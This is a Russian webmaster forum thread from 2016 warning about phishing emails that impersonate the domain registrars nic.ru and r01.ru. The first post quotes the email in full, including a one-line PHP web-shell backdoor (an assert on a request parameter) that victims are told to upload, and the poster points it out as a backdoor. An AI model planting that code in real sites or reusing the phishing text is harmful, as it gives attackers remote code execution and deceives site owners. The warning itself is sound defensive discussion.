|
| Дата |
|
USD/RUB | 93.4409 | BTC/USD | 63844.6180 |
|
|
|
Домены и регистраторы Обсуждаем вопросы доменов и регистраторов. |
23.12.2016, 20:21
|
#1
|
Senior Member
Регистрация: 01.08.2016
Сообщений: 1,332
Бабло: $155245
|
Взлом сайтов от имени регистраторов доменов
В последние 2 дня активизировались хакеры, использующие старый, как дерьмо мамонта, трюк - письмо с поддельным адресом отправителя.
Рассылаются письма от имени nic.ru и <info@r01 l.ru> - красным выделена левая буква, которой не будет видно в html-коде письма:
Цитата:
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом *****.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a7odfa980f11ce6.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 30 декабря 2016 года, 22:00 (UTC+04:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
|
То есть, предлагают самому себе на сайте сделать бэкдор. Наивно, но на всякий случай - не ведитесь.
PS: Похоже, рассылка идёт по доменам в алфавитном порядке, пока ещё работают по букве "a".
|
|
|
23.12.2016, 22:32
|
#2
|
Senior Member
Регистрация: 21.06.2013
Сообщений: 492
Бабло: $94793
|
Такой фигни нет, но пару раз в месяц приходят письма, мол пытаются сбросить пароль. На невнимательность надеются что ли? Было бы чего там тырить, все давно заброшено
|
|
|
23.12.2016, 22:38
|
#3
|
сыроед
Регистрация: 01.10.2015
Сообщений: 15,859
Бабло: $1861015
|
меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп
|
|
|
23.12.2016, 22:52
|
#4
|
Где карта, Билли?
Регистрация: 01.12.2016
Сообщений: 475
Бабло: $57565
|
Цитата:
Сообщение от веломан
меня лично заебали спамить pdf-ками буржуйскими с какими-то там отчётами, счетами итп
|
В фильме Кибер ясно показано, что это за pdf-ки. Сцена с сотрудником АНБ, где-то в середине фильма.
|
|
|
24.12.2016, 00:15
|
#5
|
Domains from $0.55
Регистрация: 21.07.2009
Сообщений: 1,590
Бабло: $186500
|
Да, все новое - хорошо забытое старое. И судя по комментам в домейнерских группах в фейсбуках, находятся те, кто на это ведутся.
|
|
|
24.12.2016, 02:03
|
#6
|
Senior Member
Регистрация: 24.06.2007
Сообщений: 5,010
Бабло: $3617171
|
Kludge, посмотрел трейлер - фигня какая-то, боевик обычный. Так как там трактуют пдфки?
|
|
|
24.12.2016, 06:00
|
#7
|
Senior Member
Регистрация: 25.12.2013
Сообщений: 6,541
Бабло: $779495
|
Прикольный разводняк, будем иметь ввиду.
__________________
Надежный и отзывчивый VPS хостинг для серьезных проектов
Проверенная годами пуш партнерка с ежедневными выплатами
|
|
|
24.12.2016, 06:59
|
#8
|
Где карта, Билли?
Регистрация: 01.12.2016
Сообщений: 475
Бабло: $57565
|
excl, ну не совсем обычный. Про хакеров кино. В pdf-ке, что подсунули анбэшнику был клавиатурный шпион от супер секретной программы. Посмотри, неплохой фильм.
|
|
|
24.12.2016, 09:42
|
#9
|
Senior Member
Регистрация: 19.04.2007
Сообщений: 2,393
Бабло: $314345
|
Уже пара недель, как идет такая рассылка типа от РуЦентра, даже сам РуЦентр разослал уже предупреждения о ней, мне на пару мыл приходило.
Причем оформлено мыло охеренно, с 1-го взгляда и не поймешь, что это фейк, пока непосредственно в текст не вчитаешься.
А если юзер не шарит (коих большинство), то запросто поведется, блин.
|
|
|
26.12.2016, 13:30
|
#10
|
Юниор
Регистрация: 02.08.2013
Сообщений: 10
Бабло: $2060
|
Мне непрерывно льётся говно с ссылками на оплату (.com .net .org) доменов. Смотрят адреса во whois и шлют письма на продление. Идёт рассчёт на идиота. Думаю что находятся такие что оплачивают. Большинство обывателей понятия не имеют от кого пришло письмо, а больше половины не помнят где регистрировали домен и будут рады кликнуть по ссылке куда нужно ввести только свою карточку для пополнения домена. Видимо это как-то так работает.
__________________
Админю, лужу, паяю, ЭВМ починяю.
|
|
|
|